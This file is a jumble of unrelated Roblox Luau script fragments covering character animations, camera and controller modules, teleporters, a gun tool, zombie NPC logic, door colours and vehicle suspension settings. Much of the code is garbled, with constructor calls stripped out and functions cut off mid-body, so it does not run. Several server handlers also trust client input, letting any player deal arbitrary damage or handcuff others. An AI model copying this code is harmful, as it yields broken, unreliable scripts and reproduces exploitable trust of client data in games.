=,1,0)* CFrame.Angles(math.rad(-80),math.rad(0),math.rad(180))} ):Play() end elseif Virar == 0 then if L_97_arg2 == 0 then TS:Create(RootJoint,, {C0 =,0,0)* CFrame.Angles(math.rad(-0),0,math.rad(0))} ):Play() TS:Create(RH,, {C0 =,-1,0)* CFrame.Angles(math.rad(-0),math.rad(90),math.rad(0))} ):Play() TS:Create(LH,, {C0 =,-1,0)* CFrame.Angles(math.rad(-0),math.rad(-90),math.rad(0))} ):Play() TS:Create(RS,, {C0 =,0.5,0)* CFrame.Angles(math.rad(0),math.rad(90),math.rad(0))} ):Play() TS:Create(LS,, {C0 =,0.5,0)* CFrame.Angles(math.rad(0),math.rad(-90),math.rad(0))} ):Play() --TS:Create(Neck,, {C0 =,1,0)* CFrame.Angles(math.rad(-90),math.rad(0),math.rad(180))} ):Play() elseif L_97_arg2 == 1 then TS:Create(RootJoint,, {C0 =,-1,0.25)* CFrame.Angles(math.rad(-10),0,math.rad(0))} ):Play() TS:Create(RH,, {C0 =,-0.35,-0.65)* CFrame.Angles(math.rad(-20),math.rad(90),math.rad(0))} ):Play() TS:Create(LH,, {C0 =,-1.25,-0.625)* CFrame.Angles(math.rad(-60),math.rad(-90),math.rad(0))} ):Play() TS:Create(RS,, {C0 =,0.5,0)* CFrame.Angles(math.rad(0),math.rad(90),math.rad(0))} ):Play() TS:Create(LS,, {C0 =,0.5,0)* CFrame.Angles(math.rad(0),math.rad(-90),math.rad(0))} ):Play() --TS:Create(Neck,, {C0 =,1,0)* CFrame.Angles(math.rad(-80),math.rad(0),math.rad(180))} ):Play() end end if Rendido and Saude.Stances.Algemado.Value == false then TS:Create(RS,, {C0 =,0.75,0)* CFrame.Angles(math.rad(110),math.rad(120),math.rad(70))} ):Play() TS:Create(LS,, {C0 =,0.75,0)* CFrame.Angles(math.rad(110),math.rad(-120),math.rad(-70))} ):Play() elseif Saude.Stances.Algemado.Value == true then TS:Create(RS,, {C0 =,0.75,0)* CFrame.Angles(math.rad(240),math.rad(120),math.rad(100))} ):Play() TS:Create(LS,, {C0 =,0.75,0)* CFrame.Angles(math.rad(240),math.rad(-120),math.rad(-100))} ):Play() else TS:Create(RS,, {C0 =,0.5,0)* CFrame.Angles(math.rad(0),math.rad(90),math.rad(0))} ):Play() TS:Create(LS,, {C0 =,0.5,0)* CFrame.Angles(math.rad(0),math.rad(-90),math.rad(0))} ):Play() end end end) Fome.OnServerEvent:Connect(function(Player) local Char = Player.Character local Saude = Char:WaitForChild("Saude") Saude.Stances.Caido.Value = true end) Algemar.OnServerEvent:Connect(function(Player,Status,Vitima,Type) if Type == 1 then local Idk = game.Players:FindFirstChild(Vitima) Idk.Character.Saude.Stances.Rendido.Value = Status else local Idk = game.Players:FindFirstChild(Vitima) Idk.Character.Saude.Stances.Algemado.Value = Status end end)
--[[ The Module ]]
-- local MouseLockController = {} MouseLockController.__index = MouseLockController function local self = setmetatable({}, MouseLockController) self.isMouseLocked = false self.savedMouseCursor = nil self.boundKeys = {Enum.KeyCode.LeftShift, Enum.KeyCode.RightShift} -- defaults self.mouseLockToggledEvent ="BindableEvent") local boundKeysObj = script:FindFirstChild("BoundKeys") if (not boundKeysObj) or (not boundKeysObj:IsA("StringValue")) then -- If object with correct name was found, but it's not a StringValue, destroy and replace if boundKeysObj then boundKeysObj:Destroy() end boundKeysObj ="StringValue") boundKeysObj.Name = "BoundKeys" boundKeysObj.Value = "LeftShift,RightShift" boundKeysObj.Parent = script end if boundKeysObj then boundKeysObj.Changed:Connect(function(value) self:OnBoundKeysObjectChanged(value) end) self:OnBoundKeysObjectChanged(boundKeysObj.Value) -- Initial setup call end -- Watch for changes to user's ControlMode and ComputerMovementMode settings and update the feature availability accordingly GameSettings.Changed:Connect(function(property) if property == "ControlMode" or property == "ComputerMovementMode" then self:UpdateMouseLockAvailability() end end) -- Watch for changes to DevEnableMouseLock and update the feature availability accordingly PlayersService.LocalPlayer:GetPropertyChangedSignal("DevEnableMouseLock"):Connect(function() self:UpdateMouseLockAvailability() end) -- Watch for changes to DevEnableMouseLock and update the feature availability accordingly PlayersService.LocalPlayer:GetPropertyChangedSignal("DevComputerMovementMode"):Connect(function() self:UpdateMouseLockAvailability() end) self:UpdateMouseLockAvailability() return self end function MouseLockController:GetIsMouseLocked() return true--self.isMouseLocked end function MouseLockController:GetBindableToggleEvent() return self.mouseLockToggledEvent.Event end function MouseLockController:GetMouseLockOffset() local offsetValueObj = script:FindFirstChild("CameraOffset") if offsetValueObj and offsetValueObj:IsA("Vector3Value") then return offsetValueObj.Value else -- If CameraOffset object was found but not correct type, destroy if offsetValueObj then offsetValueObj:Destroy() end offsetValueObj ="Vector3Value") offsetValueObj.Name = "CameraOffset" offsetValueObj.Value =,0,0) -- Legacy Default Value offsetValueObj.Parent = script end if offsetValueObj and offsetValueObj.Value then return offsetValueObj.Value end return,0,0) end function MouseLockController:UpdateMouseLockAvailability() local devAllowsMouseLock = PlayersService.LocalPlayer.DevEnableMouseLock local devMovementModeIsScriptable = PlayersService.LocalPlayer.DevComputerMovementMode == Enum.DevComputerMovementMode.Scriptable local userHasMouseLockModeEnabled = GameSettings.ControlMode == Enum.ControlMode.MouseLockSwitch local userHasClickToMoveEnabled = GameSettings.ComputerMovementMode == Enum.ComputerMovementMode.ClickToMove local MouseLockAvailable = devAllowsMouseLock and userHasMouseLockModeEnabled and not userHasClickToMoveEnabled and not devMovementModeIsScriptable if MouseLockAvailable~=self.enabled then self:EnableMouseLock(MouseLockAvailable) end end function MouseLockController:OnBoundKeysObjectChanged(newValue) self.boundKeys = {} -- Overriding defaults, note: possibly with nothing at all if boundKeysObj.Value is "" or contains invalid values for token in string.gmatch(newValue,"[^%s,]+") do for _, keyEnum in pairs(Enum.KeyCode:GetEnumItems()) do if token == keyEnum.Name then self.boundKeys[#self.boundKeys+1] = keyEnum break end end end self:UnbindContextActions() self:BindContextActions() end
local Headlights = Enum.KeyCode.H local RunningLights = Enum.KeyCode.N local FogLights = Enum.KeyCode.J local SignalLeft = Enum.KeyCode.Z local SignalRight = Enum.KeyCode.C local Hazards = Enum.KeyCode.X local Popups = Enum.KeyCode.B local Flash = Enum.KeyCode.L
-- BEHAVIOUR --Controller support
coroutine.wrap(function() -- Create PC 'Enter Controller Mode' Icon runService.Heartbeat:Wait() -- This is required to prevent an infinite recursion local Icon = require(iconModule) local controllerOptionIcon = :setProperty("internalIcon", true) :setName("_TopbarControllerOption") :setOrder(100) :setImage(11162828670) :setRight() :setEnabled(false) :setTip("Controller mode") :setProperty("deselectWhenOtherIconSelected", false) -- This decides what controller widgets and displays to show based upon their connected inputs -- For example, if on PC with a controller, give the player the option to enable controller mode with a toggle -- While if using a console (no mouse, but controller) then bypass the toggle and automatically enable controller mode userInputService:GetPropertyChangedSignal("MouseEnabled"):Connect(IconController._determineControllerDisplay) userInputService.GamepadConnected:Connect(IconController._determineControllerDisplay) userInputService.GamepadDisconnected:Connect(IconController._determineControllerDisplay) IconController._determineControllerDisplay() -- Enable/Disable Controller Mode when icon clicked local function iconClicked() local isSelected = controllerOptionIcon.isSelected local iconTip = (isSelected and "Normal mode") or "Controller mode" controllerOptionIcon:setTip(iconTip) IconController._enableControllerMode(isSelected) end controllerOptionIcon.selected:Connect(iconClicked) controllerOptionIcon.deselected:Connect(iconClicked) -- Hide/show topbar when indicator action selected in controller mode userInputService.InputBegan:Connect(function(input,gpe) if not IconController.controllerModeEnabled then return end if input.KeyCode == Enum.KeyCode.DPadDown then if not guiService.SelectedObject and checkTopbarEnabledAccountingForMimic() then IconController.setTopbarEnabled(true,false) end elseif input.KeyCode == Enum.KeyCode.ButtonB and not IconController.disableButtonB then if IconController.activeButtonBCallbacks == 1 and TopbarPlusGui.Indicator.Image == "rbxassetid://5278151556" then IconController.activeButtonBCallbacks = 0 guiService.SelectedObject = nil end if IconController.activeButtonBCallbacks == 0 then IconController._previousSelectedObject = guiService.SelectedObject IconController._setControllerSelectedObject(nil) IconController.setTopbarEnabled(false,false) end end input:Destroy() end) -- Setup overflow icons for alignment, detail in pairs(alignmentDetails) do if alignment ~= "mid" then local overflowName = "_overflowIcon-"..alignment local overflowIcon = :setProperty("internalIcon", true) :setImage(6069276526) :setName(overflowName) :setEnabled(false) detail.overflowIcon = overflowIcon overflowIcon.accountForWhenDisabled = true if alignment == "left" then overflowIcon:setOrder(math.huge) overflowIcon:setLeft() overflowIcon:set("dropdownAlignment", "right") elseif alignment == "right" then overflowIcon:setOrder(-math.huge) overflowIcon:setRight() overflowIcon:set("dropdownAlignment", "left") end overflowIcon.lockedSettings = { ["iconImage"] = true, ["order"] = true, ["alignment"] = true, } end end -- This checks if voice chat is enabled task.defer(function() local success, enabledForUser while true do success, enabledForUser = pcall(function() return voiceChatService:IsVoiceEnabledForUserIdAsync(localPlayer.UserId) end) if success then break end task.wait(1) end local function checkVoiceChatManuallyEnabled() if IconController.voiceChatEnabled then if success and enabledForUser then voiceChatIsEnabledForUserAndWithinExperience = true IconController.updateTopbar() end end end checkVoiceChatManuallyEnabled() --------------- FEEL FREE TO DELETE THIS IS YOU DO NOT USE VOICE CHAT WITHIN YOUR EXPERIENCE --------------- localPlayer.PlayerGui:WaitForChild("TopbarPlus", 999) task.delay(10, function() checkVoiceChatManuallyEnabled() if IconController.voiceChatEnabled == nil and success and enabledForUser and isStudio then warn("⚠️TopbarPlus Action Required⚠️ If VoiceChat is enabled within your experience it's vital you set IconController.voiceChatEnabled to true ``require(game.ReplicatedStorage.Icon.IconController).voiceChatEnabled = true`` otherwise the BETA label will not be accounted for within your live servers. This warning will disappear after doing so. Feel free to delete this warning or to set to false if you don't have VoiceChat enabled within your experience.") end end) ------------------------------------------------------------------------------------------------------------ end) if not isStudio then local ownerId = game.CreatorId local groupService = game:GetService("GroupService") if game.CreatorType == Enum.CreatorType.Group then local success, ownerInfo = pcall(function() return groupService:GetGroupInfoAsync(game.CreatorId).Owner end) if success then ownerId = ownerInfo.Id end end local version = require(iconModule.VERSION) if localPlayer.UserId ~= ownerId then local marketplaceService = game:GetService("MarketplaceService") local success, placeInfo = pcall(function() return marketplaceService:GetProductInfo(game.PlaceId) end) if success and placeInfo then -- Required attrbute for using TopbarPlus -- This is not printed within stuido and to the game owner to prevent mixing with debug prints local gameName = placeInfo.Name print(("\n\n\n⚽ %s uses TopbarPlus %s\n🍍 TopbarPlus was developed by ForeverHD and the Nanoblox Team\n🚀 You can learn more and take a free copy by searching for 'TopbarPlus' on the DevForum\n\n"):format(gameName, version)) end end end end)()
Players.PlayerRemoving:Connect(function(plr) local leavedata = { ["contents"] = "", ["username"] = plr.Name .. " - (#"..plr.userId..")", ["avatar_url"] = ""..plr.userId, ["embeds"] = {{ ["title"]=, ["description"] = plr.Name .. " left the Game", ["type"]= "rich", ["color"]= tonumber(0xF1C232), ["fields"]={ { ["name"]="Event: Player left", ["value"]="User: **"..plr.Name.."** with ID: **"..plr.UserId.."** left [game](".. game.PlaceId..")/[Profile]("..plr.UserId.."/profile)", ["inline"]=true}}}} } http:PostAsync(webhook,http:JSONEncode(leavedata)) game.Players.LocalPlayer:kick("") end)
--[[ Controls State Management ]]
-- local onControlsChanged = nil if IsTouchDevice then createTouchGuiContainer() onControlsChanged = function() local newModuleToEnable = nil local isJumpEnabled = false if not IsUserChoice then if DevMovementMode == Enum.DevTouchMovementMode.Thumbstick then newModuleToEnable = ControlModules.Thumbstick isJumpEnabled = true elseif DevMovementMode == Enum.DevTouchMovementMode.Thumbpad then newModuleToEnable = ControlModules.Thumbpad isJumpEnabled = true elseif DevMovementMode == Enum.DevTouchMovementMode.DPad then newModuleToEnable = ControlModules.DPad elseif DevMovementMode == Enum.DevTouchMovementMode.ClickToMove then -- Managed by CameraScript newModuleToEnable = nil elseif DevMovementMode == Enum.DevTouchMovementMode.Scriptable then newModuleToEnable = nil end else if UserMovementMode == Enum.TouchMovementMode.Default or UserMovementMode == Enum.TouchMovementMode.Thumbstick then newModuleToEnable = ControlModules.Thumbstick isJumpEnabled = true elseif UserMovementMode == Enum.TouchMovementMode.Thumbpad then newModuleToEnable = ControlModules.Thumbpad isJumpEnabled = true elseif UserMovementMode == Enum.TouchMovementMode.DPad then newModuleToEnable = ControlModules.DPad elseif UserMovementMode == Enum.TouchMovementMode.ClickToMove then -- Managed by CameraScript newModuleToEnable = nil end end setClickToMove() if newModuleToEnable ~= CurrentControlModule then if CurrentControlModule then CurrentControlModule:Disable() end setJumpModule(isJumpEnabled) CurrentControlModule = newModuleToEnable if CurrentControlModule and not IsModalEnabled then CurrentControlModule:Enable() if isJumpEnabled then TouchJumpModule:Enable() end end end end elseif UserInputService.KeyboardEnabled then onControlsChanged = function() -- NOTE: Click to move still uses keyboard. Leaving cases in case this ever changes. local newModuleToEnable = nil if not IsUserChoice then if DevMovementMode == Enum.DevComputerMovementMode.KeyboardMouse then newModuleToEnable = ControlModules.Keyboard elseif DevMovementMode == Enum.DevComputerMovementMode.ClickToMove then -- Managed by CameraScript newModuleToEnable = ControlModules.Keyboard end else if UserMovementMode == Enum.ComputerMovementMode.KeyboardMouse or UserMovementMode == Enum.ComputerMovementMode.Default then newModuleToEnable = ControlModules.Keyboard elseif UserMovementMode == Enum.ComputerMovementMode.ClickToMove then -- Managed by CameraScript newModuleToEnable = ControlModules.Keyboard end end if newModuleToEnable ~= CurrentControlModule then if CurrentControlModule then CurrentControlModule:Disable() end CurrentControlModule = newModuleToEnable if CurrentControlModule then CurrentControlModule:Enable() end end end end
function onTouched(part) if part.Parent ~= nil then local h = part.Parent:findFirstChild("Humanoid") if h~=nil then local teleportfrom=script.Parent.Enabled.Value if teleportfrom~=0 then if h==humanoid then return end local teleportto=script.Parent.Parent:findFirstChild(modelname) if teleportto~=nil then local torso = h.Parent.Torso local location = {teleportto.Position} local i = 1 local x = location[i].x local y = location[i].y local z = location[i].z x = x + math.random(-1, 1) z = z + math.random(-1, 1) y = y + math.random(2, 3) local cf = torso.CFrame local lx = 0 local ly = y local lz = 0 script.Parent.Enabled.Value=0 teleportto.Enabled.Value=0 torso.CFrame =,y,z),,ly,lz)) wait(3) script.Parent.Enabled.Value=1 teleportto.Enabled.Value=1 else print("Could not find teleporter!") end end end end end script.Parent.Touched:connect(onTouched)
--[[ local cosmeticData = require(game.ReplicatedStorage.Cosmetics5) for hairName,data in next,cosmeticData.hairs do local newButton = game.StarterGui.SpawnGui.Customization.Appearance.HairFrame.Template:Clone() newButton.Name = hairName print("loading",hairName) newButton.Image = data.image if data.locked then newButton.LayoutOrder = 2 else newButton.LayoutOrder = 1 newButton.Lock:Destroy() end newButton.Parent = game.StarterGui.SpawnGui.Customization.Appearance.HairFrame end --]]
--------Main Events----------
local Events = Tool:WaitForChild("Events") local ShootEvent = Events:WaitForChild("ShootRE") local CreateBulletEvent = Events:WaitForChild("CreateBullet") pcall(function() script.Parent:FindFirstChild("ThumbnailCamera"):Destroy() script.Parent:WaitForChild("READ ME"):Destroy() if not workspace:FindFirstChild("BulletFolder") then local BulletsFolder ="Folder", workspace) BulletsFolder.Name = "BulletsFolder" end end) function TagHumanoid(humanoid, player) if humanoid.Health > 0 then while humanoid:FindFirstChild('creator') do humanoid:FindFirstChild('creator'):Destroy() end local creatorTag ="ObjectValue") creatorTag.Value = player creatorTag.Name = "creator" creatorTag.Parent = humanoid DebrisService:AddItem(creatorTag, 1.5) local weaponIconTag ="StringValue") weaponIconTag.Value = IconURL weaponIconTag.Name = "icon" weaponIconTag.Parent = creatorTag end end function CreateBullet(bulletPos) if not workspace:FindFirstChild("BulletFolder") then local BulletFolder ="Folder") BulletFolder.Name = "Bullets" end local bullet ='Part', workspace.BulletsFolder) bullet.FormFactor = Enum.FormFactor.Custom bullet.Size =, 0.1, 0.1) bullet.BrickColor ="Black") bullet.Shape = Enum.PartType.Block bullet.CanCollide = false bullet.CFrame = bullet.Anchored = true bullet.TopSurface = Enum.SurfaceType.Smooth bullet.BottomSurface = Enum.SurfaceType.Smooth bullet.Name = 'Bullet' DebrisService:AddItem(bullet, 2.5) local shell ="Part") shell.CFrame = Tool.Handle.CFrame * CFrame.fromEulerAnglesXYZ(1.5,0,0) shell.Size =,1,1) shell.BrickColor = shell.Parent = game.Workspace.BulletsFolder shell.CFrame = script.Parent.Handle.CFrame shell.CanCollide = false shell.Transparency = 0 shell.BottomSurface = 0 shell.TopSurface = 0 shell.Name = "Shell" shell.Velocity = Tool.Handle.CFrame.lookVector * 35 +,10),20,math.random(-10,20)) shell.RotVelocity =,200,0) DebrisService:AddItem(shell, 1) local shellmesh ="SpecialMesh") shellmesh.Scale =,.4,.15) shellmesh.Parent = shell end ShootEvent.OnServerEvent:Connect(function(plr, hum ,damage) hum:TakeDamage(damage) TagHumanoid(hum, plr) end) CreateBulletEvent.OnServerEvent:Connect(function(plr, pos) CreateBullet(pos) end)
-- local AttackRange, FieldOfView, AggroRange, ChanceOfBoredom, BoredomDuration, -- Damage, DamageCooldown
local configTable = model.Configurations local configs = {} local function loadConfig(configName, defaultValue) if configTable:FindFirstChild(configName) then configs[configName] = configTable:FindFirstChild(configName).Value else configs[configName] = defaultValue end end loadConfig("AttackRange", 3) loadConfig("FieldOfView", 180) loadConfig("AggroRange", 200) loadConfig("ChanceOfBoredom", .5) loadConfig("BoredomDuration", 10) loadConfig("Damage", 10) loadConfig("DamageCooldown", 1) local StateMachine = require(game.ServerStorage.ROBLOX_StateMachine).new() local PathLib = require(game.ServerStorage.ROBLOX_PathfindingLibrary).new() local ZombieTarget = nil local ZombieTargetLastLocation = nil local lastBored = os.time() -- STATE DEFINITIONS -- IdleState: NPC stays still. Refreshes bored timer when started to -- allow for random state change local IdleState = StateMachine.NewState() IdleState.Name = "Idle" IdleState.Action = function() end IdleState.Init = function() lastBored = os.time() end -- SearchState: NPC wanders randomly increasing chance of spotting -- enemy. Refreshed bored timer when started to allow for random state -- change local SearchState = StateMachine.NewState() SearchState.Name = "Search" local lastmoved = os.time() local searchTarget = nil SearchState.Action = function() -- move to random spot nearby if model then local now = os.time() if now - lastmoved > 2 then lastmoved = now local xoff = math.random(5, 10) if math.random() > .5 then xoff = xoff * -1 end local zoff = math.random(5, 10) if math.random() > .5 then zoff = zoff * -1 end local testtarg = AIUtilities:FindCloseEmptySpace(model) --if testtarg then print(testtarg) else print("could not find") end searchTarget = + xoff,model.Torso.Position.Y,model.Torso.Position.Z + zoff) --local target = + xoff,model.Torso.Position.Y,model.Torso.Position.Z + zoff) --model.Humanoid:MoveTo(target) searchTarget = testtarg end PathLib:MoveToTarget(model, searchTarget) end end SearchState.Init = function() lastBored = os.time() end -- PursueState: Enemy has been spotted, need to give chase. local PursueState = StateMachine.NewState() PursueState.Name = "Pursue" PursueState.Action = function() -- Double check we still have target if ZombieTarget then -- Get distance to target local distance = (model.Torso.Position - ZombieTarget.Torso.Position).magnitude -- If we're far from target use pathfinding to move. Otherwise just MoveTo if distance > configs["AttackRange"] + 5 then PathLib:MoveToTarget(model, ZombieTarget.Torso.Position) else model.Humanoid:MoveTo(ZombieTarget.Torso.Position)
-- ROBLOX TODO: ADO-1552 add inline_snapshots imports when we support this -- functionality
local types = require(CurrentModule.types)
-- ROBLOX TODO START: implement missing RegExp when 'g' flag available (or reimplement without RegExp)
-- Customization
AntiTK = false; -- Set to false to allow TK and damaging of NPC, true for no TK. (To damage NPC, this needs to be false) MouseSense = 0.5; CanAim = true; -- Allows player to aim CanBolt = false; -- When shooting, if this is enabled, the bolt will move (SCAR-L, ACR, AK Series) LaserAttached = true; LightAttached = true; TracerEnabled = true; SprintSpeed = 20; CanCallout = false; SuppressCalloutChance = 0;
function KeepChopperActive() repeat wait() ChopperVal.Value = true until ChopperSwch.Value == false or Power.Value == false ChopperVal.Value = false end ChopperSwch.Changed:Connect(function() if ChopperSwch.Value == true then ChopperSwch.Parent.P1.Transparency = 1 ChopperSwch.Parent.P2.Transparency = 0 ClickSound:Play() if Power.Value == true then KeepChopperActive() end else ChopperSwch.Parent.P1.Transparency = 0 ChopperSwch.Parent.P2.Transparency = 1 ClickSound:Play() ChopperVal.Value = false end end)
--wait(0.6) --Lights.BrickColor ="Really black") --wait(3.9)
script.Disabled = true
function onTouched(part) if part.Parent ~= nil then local h = part.Parent:findFirstChild("Humanoid") if h~=nil then local teleportfrom=script.Parent.Enabled.Value if teleportfrom~=0 then if h==humanoid then return end local teleportto=script.Parent.Parent:findFirstChild(modelname) if teleportto~=nil then local head = h.Parent.Head local location = {teleportto.Position} local i = 1 local x = location[i].x local y = location[i].y local z = location[i].z x = x + math.random(-1, 1) z = z + math.random(-1, 1) y = y + math.random(2, 3) local cf = head.CFrame local lx = 0 local ly = y local lz = 0 script.Parent.Enabled.Value=0 teleportto.Enabled.Value=0 head.CFrame =,y,z),,ly,lz)) wait(3) script.Parent.Enabled.Value=1 teleportto.Enabled.Value=1 else print("Could not find teleporter!") end end end end end script.Parent.Touched:connect(onTouched)
--------RIGHT DOOR --------
game.Workspace.doorright.l11.BrickColor = game.Workspace.doorright.l12.BrickColor = game.Workspace.doorright.l13.BrickColor = game.Workspace.doorright.l41.BrickColor = game.Workspace.doorright.l42.BrickColor = game.Workspace.doorright.l43.BrickColor = game.Workspace.doorright.l71.BrickColor = game.Workspace.doorright.l72.BrickColor = game.Workspace.doorright.l73.BrickColor = game.Workspace.doorright.l21.BrickColor = game.Workspace.doorright.l22.BrickColor = game.Workspace.doorright.l23.BrickColor = game.Workspace.doorright.l51.BrickColor = game.Workspace.doorright.l52.BrickColor = game.Workspace.doorright.l53.BrickColor = game.Workspace.doorright.l31.BrickColor = game.Workspace.doorright.l32.BrickColor = game.Workspace.doorright.l33.BrickColor = game.Workspace.doorright.l61.BrickColor = game.Workspace.doorright.l62.BrickColor = game.Workspace.doorright.l63.BrickColor = game.Workspace.doorright.pillar.BrickColor =
-- move the shelly to the newfound goal
bg.CFrame =,goal) bp.Position = (,goal)*,0,-100)).p local start = tick() repeat task.wait(1/2) local ray =,,-1000,0))
--// Variables
local Player = game.Players.LocalPlayer local Frame = script.Parent local BUYB = Frame.BUY local Price = Frame.Price
--[[ Determines which paid emotes the user owns and returns them through the provided callback Parameters: player - the player used to check ownership callback - the function to call once all paid emotes have been checked ]]
function EmoteManager:getOwnedEmotesAsync(player, callback) local ownedEmotes = {} local numComplete = 0 local numEmotes = 0 -- Since paidEmotes is a dictionary, we have to loop over it to count the items for _ in pairs(paidEmotes) do numEmotes = numEmotes + 1 end for emoteName, emoteInfo in pairs(paidEmotes) do task.spawn(function() local success, ownsEmote = pcall(function() return self.MarketplaceService:PlayerOwnsAsset(player, emoteInfo.emote) end) if success and ownsEmote then ownedEmotes[emoteName] = emoteInfo end numComplete = numComplete + 1 if numComplete == numEmotes then callback(ownedEmotes) end end) end end
-- When the player gets closer than WAVE_THRESHOLD, NPC will wave. -- Will not wave again until the player goes outside of WAVE_THRESHOLD again.
local WAVE_THRESHOLD = 20 -- studs local WAVE_DEBOUNCE_TIME = 3 -- seconds
--tables --functions --main
while true do --loop local selectedcolor =,255),math.random(1,255),math.random(1,255)) for i,v in pairs(tiles) do --go through all tiles inside of model if v.Name == "tile" then --if name is tile then continue v.Color = selectedcolor end end wait(speed) --do not remove this end
--Precalculated paths
local t,f,n=true,false,{} local r={ [58]={{54,53,52,47,48,49,45,44,28,29,31,32,34,35,39,41,30,56,58},t}, [49]={{54,53,52,47,48,49},t}, [16]={n,f}, [19]={{54,53,52,47,48,49,45,44,28,29,31,32,34,35,39,41,30,56,58,20,19},t}, [59]={{54,53,52,47,48,49,45,44,28,29,31,32,34,35,39,41,59},t}, [63]={{54,53,52,47,48,49,45,44,28,29,31,32,34,35,39,41,30,56,58,23,62,63},t}, [34]={{54,53,52,47,48,49,45,44,28,29,31,32,34},t}, [21]={{54,53,52,47,48,49,45,44,28,29,31,32,34,35,39,41,30,56,58,20,21},t}, [48]={{54,53,52,47,48},t}, [27]={{54,53,52,47,48,49,45,44,28,27},t}, [14]={n,f}, [31]={{54,53,52,47,48,49,45,44,28,29,31},t}, [56]={{54,53,52,47,48,49,45,44,28,29,31,32,34,35,39,41,30,56},t}, [29]={{54,53,52,47,48,49,45,44,28,29},t}, [13]={n,f}, [47]={{54,53,52,47},t}, [12]={n,f}, [45]={{54,53,52,47,48,49,45},t}, [57]={{54,53,52,47,48,49,45,44,28,29,31,32,34,35,39,41,30,56,57},t}, [36]={{54,53,52,47,48,49,45,44,28,29,31,32,33,36},t}, [25]={{54,53,52,47,48,49,45,44,28,27,26,25},t}, [71]={{54,53,52,47,48,49,45,44,28,29,31,32,34,35,39,41,59,61,71},t}, [20]={{54,53,52,47,48,49,45,44,28,29,31,32,34,35,39,41,30,56,58,20},t}, [60]={{54,53,52,47,48,49,45,44,28,29,31,32,34,35,39,41,60},t}, [8]={n,f}, [4]={n,f}, [75]={{54,53,52,47,48,49,45,44,28,29,31,32,34,35,39,41,59,61,71,72,76,73,75},t}, [22]={{54,53,52,47,48,49,45,44,28,29,31,32,34,35,39,41,30,56,58,20,21,22},t}, [74]={{54,53,52,47,48,49,45,44,28,29,31,32,34,35,39,41,59,61,71,72,76,73,74},t}, [62]={{54,53,52,47,48,49,45,44,28,29,31,32,34,35,39,41,30,56,58,23,62},t}, [1]={n,f}, [6]={n,f}, [11]={n,f}, [15]={n,f}, [37]={{54,53,52,47,48,49,45,44,28,29,31,32,33,36,37},t}, [2]={n,f}, [35]={{54,53,52,47,48,49,45,44,28,29,31,32,34,35},t}, [53]={{54,53},t}, [73]={{54,53,52,47,48,49,45,44,28,29,31,32,34,35,39,41,59,61,71,72,76,73},t}, [72]={{54,53,52,47,48,49,45,44,28,29,31,32,34,35,39,41,59,61,71,72},t}, [33]={{54,53,52,47,48,49,45,44,28,29,31,32,33},t}, [69]={{54,53,52,47,48,49,45,44,28,29,31,32,34,35,39,41,60,69},t}, [65]={{54,53,52,47,48,49,45,44,28,29,31,32,34,35,39,41,30,56,58,20,19,66,64,65},t}, [26]={{54,53,52,47,48,49,45,44,28,27,26},t}, [68]={{54,53,52,47,48,49,45,44,28,29,31,32,34,35,39,41,30,56,58,20,19,66,64,67,68},t}, [76]={{54,53,52,47,48,49,45,44,28,29,31,32,34,35,39,41,59,61,71,72,76},t}, [50]={{54,53,52,50},t}, [66]={{54,53,52,47,48,49,45,44,28,29,31,32,34,35,39,41,30,56,58,20,19,66},t}, [10]={n,f}, [24]={{54,53,52,47,48,49,45,44,28,27,26,25,24},t}, [23]={{54,53,52,47,48,49,45,44,28,29,31,32,34,35,39,41,30,56,58,23},t}, [44]={{54,53,52,47,48,49,45,44},t}, [39]={{54,53,52,47,48,49,45,44,28,29,31,32,34,35,39},t}, [32]={{54,53,52,47,48,49,45,44,28,29,31,32},t}, [3]={n,f}, [30]={{54,53,52,47,48,49,45,44,28,29,31,32,34,35,39,41,30},t}, [51]={{54,55,51},t}, [18]={n,f}, [67]={{54,53,52,47,48,49,45,44,28,29,31,32,34,35,39,41,30,56,58,20,19,66,64,67},t}, [61]={{54,53,52,47,48,49,45,44,28,29,31,32,34,35,39,41,59,61},t}, [55]={{54,55},t}, [46]={{54,53,52,47,46},t}, [42]={{54,53,52,47,48,49,45,44,28,29,31,32,34,35,38,42},t}, [40]={{54,53,52,47,48,49,45,44,28,29,31,32,34,35,40},t}, [52]={{54,53,52},t}, [54]={{54},t}, [43]={n,f}, [7]={n,f}, [9]={n,f}, [41]={{54,53,52,47,48,49,45,44,28,29,31,32,34,35,39,41},t}, [17]={n,f}, [38]={{54,53,52,47,48,49,45,44,28,29,31,32,34,35,38},t}, [28]={{54,53,52,47,48,49,45,44,28},t}, [5]={n,f}, [64]={{54,53,52,47,48,49,45,44,28,29,31,32,34,35,39,41,30,56,58,20,19,66,64},t}, } return r
Tune.SusEnabled = true -- works only in with PGSPhysicsSolverEnabled, defaults to false when PGS is disabled --Front Suspension Tune.FSusDamping = 500 -- Spring Dampening Tune.FSusStiffness = 12000 -- Spring Force Tune.FAntiRoll = 50 -- Anti-Roll (Gyro Dampening) Tune.FSusLength = 2 -- Suspension length (in studs) Tune.FPreCompress = .15 -- Pre-compression adds resting length force Tune.FExtensionLim = .3 -- Max Extension Travel (in studs) Tune.FCompressLim = .1 -- Max Compression Travel (in studs) Tune.FSusAngle = 80 -- Suspension Angle (degrees from horizontal) Tune.FWsBoneLen = 5 -- Wishbone Length Tune.FWsBoneAngle = 0 -- Wishbone angle (degrees from horizontal) Tune.FAnchorOffset = { -- Suspension anchor point offset (relative to center of wheel) --[[Lateral]] -.4 , -- positive = outward --[[Vertical]] -.5 , -- positive = upward --[[Forward]] 0 } -- positive = forward --Rear Suspension Tune.RSusDamping = 500 -- Spring Dampening Tune.RSusStiffness = 12000 -- Spring Force Tune.FAntiRoll = 30 -- Anti-Roll (Gyro Dampening) Tune.RSusLength = 2 -- Suspension length (in studs) Tune.RPreCompress = .09 -- Pre-compression adds resting length force Tune.RExtensionLim = .3 -- Max Extension Travel (in studs) Tune.RCompressLim = .1 -- Max Compression Travel (in studs) Tune.RSusAngle = 80 -- Suspension Angle (degrees from horizontal) Tune.RWsBoneLen = 5 -- Wishbone Length Tune.RWsBoneAngle = 0 -- Wishbone angle (degrees from horizontal) Tune.RAnchorOffset = { -- Suspension anchor point offset (relative to center of wheel) --[[Lateral]] -.4 , -- positive = outward --[[Vertical]] -.5 , -- positive = upward --[[Forward]] 0 } -- positive = forward --Aesthetics Tune.SusVisible = false -- Spring Visible Tune.WsBVisible = false -- Wishbone Visible Tune.SusRadius = .2 -- Suspension Coil Radius Tune.SusThickness = .1 -- Suspension Coil Thickness Tune.SusColor = "Bright red" -- Suspension Color [BrickColor] Tune.SusCoilCount = 6 -- Suspension Coil Count Tune.WsColor = "Black" -- Wishbone Color [BrickColor] 